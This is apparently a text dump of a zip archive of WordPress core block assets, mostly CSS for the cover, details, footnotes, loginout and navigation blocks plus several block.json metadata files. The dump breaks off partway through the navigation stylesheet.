.wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{ opacity:1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{ opacity:0; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{ opacity:.1; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{ opacity:.2; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{ opacity:.3; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{ opacity:.4; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{ opacity:.5; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{ opacity:.6; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{ opacity:.7; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{ opacity:.8; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{ opacity:.9; } .wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{ opacity:1; } .wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{ max-width:420px; width:100%; } .wp-block-cover-image:after,.wp-block-cover:after{ content:""; display:block; font-size:0; min-height:inherit; } @supports (position:sticky){ .wp-block-cover-image:after,.wp-block-cover:after{ content:none; } } .wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{ display:flex; } .wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{ color:inherit; width:100%; z-index:1; } .wp-block-cover h1:where(:not(.has-text-color)),.wp-block-cover h2:where(:not(.has-text-color)),.wp-block-cover h3:where(:not(.has-text-color)),.wp-block-cover h4:where(:not(.has-text-color)),.wp-block-cover h5:where(:not(.has-text-color)),.wp-block-cover h6:where(:not(.has-text-color)),.wp-block-cover p:where(:not(.has-text-color)),.wp-block-cover-image h1:where(:not(.has-text-color)),.wp-block-cover-image h2:where(:not(.has-text-color)),.wp-block-cover-image h3:where(:not(.has-text-color)),.wp-block-cover-image h4:where(:not(.has-text-color)),.wp-block-cover-image h5:where(:not(.has-text-color)),.wp-block-cover-image h6:where(:not(.has-text-color)),.wp-block-cover-image p:where(:not(.has-text-color)){ color:inherit; } .wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{ align-items:flex-start; justify-content:flex-start; } .wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{ align-items:flex-start; justify-content:center; } .wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{ align-items:flex-start; justify-content:flex-end; } .wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{ align-items:center; justify-content:flex-start; } .wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{ align-items:center; justify-content:center; } .wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{ align-items:center; justify-content:flex-end; } .wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{ align-items:flex-end; justify-content:flex-start; } .wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{ align-items:flex-end; justify-content:center; } .wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{ align-items:flex-end; justify-content:flex-end; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{ margin:0; } .wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{ margin:0; width:auto; } .wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{ border:none; bottom:0; box-shadow:none; height:100%; left:0; margin:0; max-height:none; max-width:none; object-fit:cover; outline:none; padding:0; position:absolute; right:0; top:0; width:100%; } .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:fixed; background-repeat:no-repeat; background-size:cover; } @supports (-webkit-touch-callout:inherit){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } @media (prefers-reduced-motion:reduce){ .wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{ background-attachment:scroll; } } .wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{ background-repeat:repeat; background-size:auto; } .wp-block-cover__image-background,.wp-block-cover__video-background{ z-index:0; } .wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{ color:#fff; } .wp-block-cover-image .wp-block-cover.has-left-content{ justify-content:flex-start; } .wp-block-cover-image .wp-block-cover.has-right-content{ justify-content:flex-end; } .wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{ margin-left:0; text-align:left; } .wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{ margin-right:0; text-align:right; } .wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{ font-size:2em; line-height:1.25; margin-bottom:0; max-width:840px; padding:.44em; text-align:center; z-index:1; } :where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){ color:#fff; } :where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){ color:#000; }PK7[m--details/editor.min.cssnu[.wp-block-details summary div{display:inline}PK7[aadetails/style-rtl.min.cssnu[.wp-block-details{box-sizing:border-box;overflow:hidden}.wp-block-details summary{cursor:pointer}PK7[^>uudetails/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/details", "title": "Details", "category": "text", "description": "Hide and show additional content.", "keywords": [ "accordion", "summary", "toggle", "disclosure" ], "textdomain": "default", "attributes": { "showContent": { "type": "boolean", "default": false }, "summary": { "type": "string", "source": "html", "selector": "summary" } }, "supports": { "align": [ "wide", "full" ], "color": { "gradients": true, "link": true, "__experimentalDefaultControls": { "background": true, "text": true } }, "__experimentalBorder": { "color": true, "width": true, "style": true }, "html": false, "spacing": { "margin": true, "padding": true, "blockGap": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } }, "layout": { "allowEditing": false } }, "editorStyle": "wp-block-details-editor", "style": "wp-block-details" } PK7[Z22details/editor.cssnu[.wp-block-details summary div{ display:inline; }PK7[aadetails/style.min.cssnu[.wp-block-details{box-sizing:border-box;overflow:hidden}.wp-block-details summary{cursor:pointer}PK7[Z22details/editor-rtl.cssnu[.wp-block-details summary div{ display:inline; }PK7[m--details/editor-rtl.min.cssnu[.wp-block-details summary div{display:inline}PK7[|ppdetails/style-rtl.cssnu[.wp-block-details{ box-sizing:border-box; overflow:hidden; } .wp-block-details summary{ cursor:pointer; }PK7[|ppdetails/style.cssnu[.wp-block-details{ box-sizing:border-box; overflow:hidden; } .wp-block-details summary{ cursor:pointer; }PK7[}  footnotes/style-rtl.min.cssnu[.editor-styles-wrapper,.entry-content{counter-reset:footnotes}a[data-fn].fn{counter-increment:footnotes;display:inline-flex;font-size:smaller;text-decoration:none;text-indent:-9999999px;vertical-align:super}a[data-fn].fn:after{content:"[" counter(footnotes) "]";float:right;text-indent:0}PK7[Zfootnotes/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/footnotes", "title": "Footnotes", "category": "text", "description": "", "keywords": [ "references" ], "textdomain": "default", "usesContext": [ "postId", "postType" ], "supports": { "__experimentalBorder": { "radius": true, "color": true, "width": true, "style": true, "__experimentalDefaultControls": { "radius": false, "color": false, "width": false, "style": false } }, "color": { "background": true, "link": true, "text": true, "__experimentalDefaultControls": { "link": true, "text": true } }, "html": false, "multiple": false, "reusable": false, "spacing": { "margin": true, "padding": true, "__experimentalDefaultControls": { "margin": false, "padding": false } }, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalTextDecoration": true, "__experimentalFontStyle": true, "__experimentalFontWeight": true, "__experimentalLetterSpacing": true, "__experimentalTextTransform": true, "__experimentalWritingMode": true, "__experimentalDefaultControls": { "fontSize": true } } }, "style": "wp-block-footnotes" } PK7[GtYOfootnotes/style.min.cssnu[.editor-styles-wrapper,.entry-content{counter-reset:footnotes}a[data-fn].fn{counter-increment:footnotes;display:inline-flex;font-size:smaller;text-decoration:none;text-indent:-9999999px;vertical-align:super}a[data-fn].fn:after{content:"[" counter(footnotes) "]";float:left;text-indent:0}PK7[ 2HHfootnotes/style-rtl.cssnu[.editor-styles-wrapper,.entry-content{ counter-reset:footnotes; } a[data-fn].fn{ counter-increment:footnotes; display:inline-flex; font-size:smaller; text-decoration:none; text-indent:-9999999px; vertical-align:super; } a[data-fn].fn:after{ content:"[" counter(footnotes) "]"; float:right; text-indent:0; }PK7[1"zGGfootnotes/style.cssnu[.editor-styles-wrapper,.entry-content{ counter-reset:footnotes; } a[data-fn].fn{ counter-increment:footnotes; display:inline-flex; font-size:smaller; text-decoration:none; text-indent:-9999999px; vertical-align:super; } a[data-fn].fn:after{ content:"[" counter(footnotes) "]"; float:left; text-indent:0; }PK7[e$^44home-link/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/home-link", "category": "design", "parent": [ "core/navigation" ], "title": "Home Link", "description": "Create a link that always points to the homepage of the site. Usually not necessary if there is already a site title link present in the header.", "textdomain": "default", "attributes": { "label": { "type": "string" } }, "usesContext": [ "textColor", "customTextColor", "backgroundColor", "customBackgroundColor", "fontSize", "customFontSize", "style" ], "supports": { "reusable": false, "html": false, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } }, "editorStyle": "wp-block-home-link-editor", "style": "wp-block-home-link" } PK7[jlegacy-widget/block.jsonnu[{ "apiVersion": 3, "name": "core/legacy-widget", "title": "Legacy Widget", "category": "widgets", "description": "Display a legacy widget.", "textdomain": "default", "attributes": { "id": { "type": "string", "default": null }, "idBase": { "type": "string", "default": null }, "instance": { "type": "object", "default": null } }, "supports": { "html": false, "customClassName": false, "reusable": false }, "editorStyle": "wp-block-legacy-widget-editor" } PK7[UVlllist-item/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/list-item", "title": "List item", "category": "text", "parent": [ "core/list" ], "description": "Create a list item.", "textdomain": "default", "attributes": { "placeholder": { "type": "string" }, "content": { "type": "string", "source": "html", "selector": "li", "default": "", "__experimentalRole": "content" } }, "supports": { "className": false, "__experimentalSelector": "li", "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[`))loginout/style-rtl.min.cssnu[.wp-block-loginout{box-sizing:border-box}PK7[ĝ<<loginout/block.jsonnu[{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/loginout", "title": "Login/out", "category": "theme", "description": "Show login & logout links.", "keywords": [ "login", "logout", "form" ], "textdomain": "default", "attributes": { "displayLoginAsForm": { "type": "boolean", "default": false }, "redirectToCurrent": { "type": "boolean", "default": true } }, "supports": { "className": true, "typography": { "fontSize": true, "lineHeight": true, "__experimentalFontFamily": true, "__experimentalFontWeight": true, "__experimentalFontStyle": true, "__experimentalTextTransform": true, "__experimentalTextDecoration": true, "__experimentalLetterSpacing": true, "__experimentalDefaultControls": { "fontSize": true } } } } PK7[`))loginout/style.min.cssnu[.wp-block-loginout{box-sizing:border-box}PK7[Vot..loginout/style-rtl.cssnu[.wp-block-loginout{ box-sizing:border-box; }PK7[Vot..loginout/style.cssnu[.wp-block-loginout{ box-sizing:border-box; }PK7[:.:.navigation/editor.min.cssnu[.editor-styles-wrapper .wp-block-navigation ul{margin-bottom:0;margin-left:0;margin-top:0;padding-left:0}.editor-styles-wrapper .wp-block-navigation .wp-block-navigation-item.wp-block{margin:revert}.wp-block-navigation-item__label{display:inline}.wp-block-navigation-item,.wp-block-navigation__container{background-color:inherit}.wp-block-navigation:not(.is-selected):not(.has-child-selected) .has-child:hover>.wp-block-navigation__submenu-container{opacity:0;visibility:hidden}.has-child.has-child-selected>.wp-block-navigation__submenu-container,.has-child.is-selected>.wp-block-navigation__submenu-container{display:flex;opacity:1;visibility:visible}.is-dragging-components-draggable .has-child.is-dragging-within>.wp-block-navigation__submenu-container{opacity:1;visibility:visible}.is-editing>.wp-block-navigation__container{display:flex;flex-direction:column;opacity:1;visibility:visible}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container{opacity:1;visibility:hidden}.is-dragging-components-draggable .wp-block-navigation-link>.wp-block-navigation__container .block-editor-block-draggable-chip-wrapper{visibility:visible}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender{display:block;position:static;width:100%}.is-editing>.wp-block-navigation__submenu-container>.block-list-appender .block-editor-button-block-appender{background:#1e1e1e;border-radius:2px;color:#fff;margin-left:auto;margin-right:0;padding:0;width:24px}.wp-block-navigation__submenu-container .block-list-appender{display:none}.block-library-colors-selector{width:auto}.block-library-colors-selector .block-library-colors-selector__toggle{display:block;margin:0 auto;padding:3px;width:auto}.block-library-colors-selector .block-library-colors-selector__icon-container{align-items:center;border-radius:4px;display:flex;height:30px;margin:0 auto;padding:3px;position:relative}.block-library-colors-selector .block-library-colors-selector__state-selection{border-radius:11px;box-shadow:inset 0 0 0 1px rgba(0,0,0,.2);height:22px;line-height:20px;margin-left:auto;margin-right:auto;min-height:22px;min-width:22px;padding:2px;width:22px}.block-library-colors-selector .block-library-colors-selector__state-selection>svg{min-width:auto!important}.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg,.block-library-colors-selector .block-library-colors-selector__state-selection.has-text-color>svg path{color:inherit}.block-library-colors-selector__popover .color-palette-controller-container{padding:16px}.block-library-colors-selector__popover .components-base-control__label{height:20px;line-height:20px}.block-library-colors-selector__popover .component-color-indicator{float:right;margin-top:2px}.block-library-colors-selector__popover .components-panel__body-title{display:none}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender{background-color:#1e1e1e;color:#fff}.wp-block-navigation .wp-block+.block-list-appender .block-editor-button-block-appender.block-editor-button-block-appender.block-editor-button-block-appender{padding:0}.wp-block-navigation .wp-block .wp-block .block-editor-button-block-appender{background-color:transparent;color:#1e1e1e}@keyframes loadingpulse{0%{opacity:1}50%{opacity:.5}to{opacity:1}}.components-placeholder.wp-block-navigation-placeholder{background:none;box-shadow:none;color:inherit;min-height:0;outline:none;padding:0}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset{font-size:inherit}.components-placeholder.wp-block-navigation-placeholder .components-placeholder__fieldset .components-button{margin-bottom:0}.wp-block-navigation.is-selected .components-placeholder.wp-block-navigation-placeholder{color:#1e1e1e}.wp-block-navigation-placeholder__preview{align-items:center;background:transparent;color:currentColor;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;min-width:96px}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__preview{display:none}.wp-block-navigation-placeholder__preview:before{border:1px dashed;border-radius:2px;border-radius:inherit;bottom:0;content:"";display:block;left:0;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview:before:before{background:currentColor;bottom:0;content:"";left:0;opacity:.1;pointer-events:none;position:absolute;right:0;top:0}.wp-block-navigation-placeholder__preview>svg{fill:currentColor}.wp-block-navigation.is-vertical .is-medium .components-placeholder__fieldset,.wp-block-navigation.is-vertical .is-small .components-placeholder__fieldset{min-height:90px}.wp-block-navigation.is-vertical .is-large .components-placeholder__fieldset{min-height:132px}.wp-block-navigation-placeholder__controls,.wp-block-navigation-placeholder__preview{align-items:flex-start;flex-direction:row;padding:6px 8px}.wp-block-navigation-placeholder__controls{background-color:#fff;border-radius:2px;box-shadow:inset 0 0 0 1px #1e1e1e;display:none;float:left;position:relative;width:100%;z-index:1}.wp-block-navigation.is-selected .wp-block-navigation-placeholder__controls{display:flex}.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-medium .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator,.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions__indicator+hr{display:none}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions{align-items:flex-start;flex-direction:column}.is-small .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr,.wp-block-navigation.is-vertical .wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__actions hr{display:none}.wp-block-navigation-placeholder__controls .wp-block-navigation-placeholder__icon{height:36px;margin-right:12px}.wp-block-navigation-placeholder__actions__indicator{align-items:center;display:flex;height:36px;justify-content:flex-start;line-height:0;margin-left:4px;padding:0 6px 0 0}.wp-block-navigation-placeholder__actions__indicator svg{fill:currentColor;margin-right:4px}.wp-block-navigation .components-placeholder.is-medium .components-placeholder__fieldset{flex-direction:row!important}.wp-block-navigation-placeholder__actions{align-items:center;display:flex;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;gap:6px;height:100%}.wp-block-navigation-placeholder__actions .components-dropdown,.wp-block-navigation-placeholder__actions>.components-button{margin-right:0}.wp-block-navigation-placeholder__actions.wp-block-navigation-placeholder__actions hr{background-color:#1e1e1e;border:0;height:100%;margin:auto 0;max-height:16px;min-height:1px;min-width:1px}@media (min-width:600px){.wp-block-navigation__responsive-container:not(.is-menu-open) .components-button.wp-block-navigation__responsive-container-close{display:none}}.wp-block-navigation__responsive-container.is-menu-open{position:fixed;top:155px}@media (min-width:782px){.wp-block-navigation__responsive-container.is-menu-open{left:36px;top:93px}}@media (min-width:960px){.wp-block-navigation__responsive-container.is-menu-open{left:160px}}@media (min-width:782px){.has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{top:141px}}.is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:141px}.is-sidebar-opened .wp-block-navigation__responsive-container.is-menu-open{right:280px}.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{left:0;top:155px}@media (min-width:782px){.is-fullscreen-mode .wp-block-navigation__responsive-container.is-menu-open{top:61px}.is-fullscreen-mode .has-fixed-toolbar .wp-block-navigation__responsive-container.is-menu-open{top:109px}}.is-fullscreen-mode .is-mobile-preview .wp-block-navigation__responsive-container.is-menu-open,.is-fullscreen-mode .is-tablet-preview .wp-block-navigation__responsive-container.is-menu-open{top:109px}body.editor-styles-wrapper .wp-block-navigation__responsive-container.is-menu-open{bottom:0;left:0;right:0;top:0}.components-button.wp-block-navigation__responsive-container-close.wp-block-navigation__responsive-container-close,.components-button.wp-block-navigation__responsive-container-open.wp-block-navigation__responsive-container-open{color:inherit;height:auto;padding:0}.components-heading.wp-block-navigation-off-canvas-editor__title{margin:0}.wp-block-navigation-off-canvas-editor__header{margin-bottom:8px}.is-menu-open .wp-block-navigation__responsive-container-content * .block-list-appender{margin-top:16px}@keyframes fadein{0%{opacity:0}to{opacity:1}}.wp-block-navigation__loading-indicator-container{padding:8px 12px}.wp-block-navigation .wp-block-navigation__uncontrolled-inner-blocks-loading-indicator{margin-top:0}@keyframes fadeouthalf{0%{opacity:1}to{opacity:.5}}.wp-block-navigation-delete-menu-button{justify-content:center;margin-bottom:16px;width:100%}.components-button.is-link.wp-block-navigation-manage-menus-button{margin-bottom:16px}.wp-block-navigation__overlay-menu-preview{align-items:center;background-color:#f0f0f0;display:flex;height:64px;justify-content:space-between;margin-bottom:12px;padding:0 24px;width:100%}.wp-block-navigation__overlay-menu-preview.open{background-color:#fff;box-shadow:inset 0 0 0 1px #e0e0e0;outline:1px solid transparent}.wp-block-navigation-placeholder__actions hr+hr,.wp-block-navigation__toolbar-menu-selector.components-toolbar-group:empty{display:none}.wp-block-navigation__navigation-selector{margin-bottom:16px;width:100%}.wp-block-navigation__navigation-selector-button{border:1px solid;justify-content:space-between;width:100%}.wp-block-navigation__navigation-selector-button__icon{flex:0 0 auto}.wp-block-navigation__navigation-selector-button__label{flex:0 1 auto;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.wp-block-navigation__navigation-selector-button--createnew{border:1px solid;margin-bottom:16px;width:100%}.wp-block-navigation__responsive-container-open.components-button{opacity:1}.wp-block-navigation__menu-inspector-controls{overflow-x:auto;scrollbar-color:transparent transparent;scrollbar-gutter:stable both-edges;scrollbar-width:thin;will-change:transform}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar{height:12px;width:12px}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-track{background-color:transparent}.wp-block-navigation__menu-inspector-controls::-webkit-scrollbar-thumb{background-clip:padding-box;background-color:transparent;border:3px solid transparent;border-radius:8px}.wp-block-navigation__menu-inspector-controls:focus-within::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:focus::-webkit-scrollbar-thumb,.wp-block-navigation__menu-inspector-controls:hover::-webkit-scrollbar-thumb{background-color:#949494}.wp-block-navigation__menu-inspector-controls:focus,.wp-block-navigation__menu-inspector-controls:focus-within,.wp-block-navigation__menu-inspector-controls:hover{scrollbar-color:#949494 transparent}@media (hover:none){.wp-block-navigation__menu-inspector-controls{scrollbar-color:#949494 transparent}}.wp-block-navigation__menu-inspector-controls__empty-message{margin-left:24px}PK7[@@navigation/style-rtl.min.cssnu[.wp-block-navigation{--navigation-layout-justification-setting:flex-start;--navigation-layout-direction:row;--navigation-layout-wrap:wrap;--navigation-layout-justify:flex-start;--navigation-layout-align:center;position:relative}.wp-block-navigation ul{margin-bottom:0;margin-right:0;margin-top:0;padding-right:0}.wp-block-navigation ul,.wp-block-navigation ul li{list-style:none;padding:0}.wp-block-navigation .wp-block-navigation-item{align-items:center;background-color:inherit;display:flex;position:relative}.wp-block-navigation .wp-block-navigation-item .wp-block-navigation__submenu-container:empty{display:none}.wp-block-navigation .wp-block-navigation-item__content{display:block}.wp-block-navigation .wp-block-navigation-item__content.wp-block-navigation-item__content{color:inherit}.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-underline .wp-block-navigation-item__content:focus{text-decoration:underline}.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:active,.wp-block-navigation.has-text-decoration-line-through .wp-block-navigation-item__content:focus{text-decoration:line-through}.wp-block-navigation:where(:not([class*=has-text-decoration])) a{text-decoration:none}.wp-block-navigation:where(:not([class*=has-text-decoration])) a:active,.wp-block-navigation:where(:not([class*=has-text-decoration])) a:focus{text-decoration:none}.wp-block-navigation .wp-block-navigation__submenu-icon{align-self:center;background-color:inherit;border:none;color:currentColor;display:inline-block;font-size:inherit;height:.6em;line-height:0;margin-right:.25em;padding:0;width:.6em}.wp-block-navigation .wp-block-navigation__submenu-icon svg{stroke:currentColor;display:inline-block;height:inherit;margin-top:.075em;width:inherit}.wp-block-navigation.is-vertical{--navigation-layout-direction:column;--navigation-layout-justify:initial;--navigation-layout-align:flex-start}.wp-block-navigation.no-wrap{--navigation-layout-wrap:nowrap}.wp-block-navigation.items-justified-center{--navigation-layout-justification-setting:center;--navigation-layout-justify:center}.wp-block-navigation.items-justified-center.is-vertical{--navigation-layout-align:center}.wp-block-navigation.items-justified-right{--navigation-layout-justification-setting:flex-end;--navigation-layout-justify:flex-end}.wp-block-navigation.items-justified-right.is-vertical{--navigation-layout-align:flex-end}.wp-block-navigation.items-justified-space-between{--navigation-layout-justification-setting:space-between;--navigation-layout-justify:space-between}.wp-block-navigation .has-child .wp-block-navigation__submenu-container{align-items:normal;background-color:inherit;color:inherit;display:flex;flex-direction:column;height:0;opacity:0;overflow:hidden;position:absolute;right:-1px;top:100%;transition:opacity .1s linear;visibility:hidden;width:0;z-index:2}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content{display:flex;flex-grow:1}.wp-block-navigation .has-child .wp-block-navigation__submenu-container>.wp-block-navigation-item>.wp-block-navigation-item__content 